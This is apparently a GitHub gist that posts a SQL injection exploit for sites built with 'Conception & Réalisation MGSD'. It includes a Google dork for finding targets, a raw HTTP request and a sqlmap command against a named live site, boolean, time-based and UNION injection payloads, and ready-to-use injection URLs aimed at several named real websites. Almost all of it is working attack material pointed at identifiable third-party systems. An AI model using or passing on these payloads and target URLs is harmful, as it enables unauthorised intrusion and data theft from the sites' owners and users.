Last active
April 15, 2024 17:37
-
-
Save JayChousfan/6a3a8e5a0fa5f1088d83ee21ed2dbb4a to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
********************************************************* | |
#Exploit Title: Conception & Réalisation MGSD - Blind Sql Injection Vulnerability | |
#Date: 2023-09-11 | |
#Exploit Author: Behrouz Mansoori | |
#Google Dork: "Conception & Réalisation MGSD" | |
#Category:webapps | |
#Tested On: Mac, Firefox | |
[+] search Dork : "Conception & Réalisation MGSD" google hack | |
![image-20240416004338784](https://gist.github.com/assets/87851908/873d9e97-f422-4642-aef0-3c3bf42cca0b) | |
Example 1: | |
<<1.txt | |
GET /under_products_marechal.php?id= HTTP/1.1 | |
Host: www.lakelec.com | |
Pragma: no-cache | |
Cache-Control: no-cache | |
Upgrade-Insecure-Requests: 1 | |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 | |
Accept-Encoding: gzip, deflate | |
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6 | |
Connection: close | |
sqlmap -r 1.txt -p "id" --batch --level 3 --risk 3 --random-agent | |
Payload: | |
--- | |
Parameter: id (GET) | |
Type: boolean-based blind | |
Title: OR boolean-based blind - WHERE or HAVING clause | |
Payload: id=-5908' OR 5413=5413-- CZqv | |
Type: time-based blind | |
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) | |
Payload: id=' AND (SELECT 2816 FROM (SELECT(SLEEP(5)))PMke)-- TztO | |
Type: UNION query | |
Title: Generic UNION query (NULL) - 5 columns | |
Payload: id=' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71767a7671,0x4e506e4c444144656b7746677852557a6772564e504c444456674a42516d7a4b43617a4950637250,0x716a626b71),NULL-- - | |
![QQ图片20240416012201](https://gist.github.com/assets/87851908/ac40523d-6be1-4e94-a1d4-42484f8dd281) | |
Example 2: | |
https://www.cmcelqods-dz.com/notre-expertise-details.php?id=%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,CONCAT(0x71767a7671,0x4e506e4c444144656b7746677852557a6772564e504c444456674a42516d7a4b43617a4950637250,0x716a626b71),NULL--%20- | |
https://www.cmcelqods-dz.com/injectables-details.php?id=%27%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x71767a7671,0x4e506e4c444144656b7746677852557a6772564e504c444456674a42516d7a4b43617a4950637250,0x716a626b71),NULL,NULL--%20- | |
https://www.cmcelqods-dz.com/nos-praticiens-detail.php?id=%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,substring(@@version,1,1)=1,NULL,NULL--%20- | |
https://www.tiziriceramica.com/en/actualites-detail.php?id=2%27%20and%20substring(@@version,1,1)=5--+&titre=Salon%20international%20des%20promoteurs%20immobiliers%20et%20maisons%20intelligentes%20E-LOGIA%20Oran | |
reference: https://cxsecurity.com/issue/WLB-2023090062 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment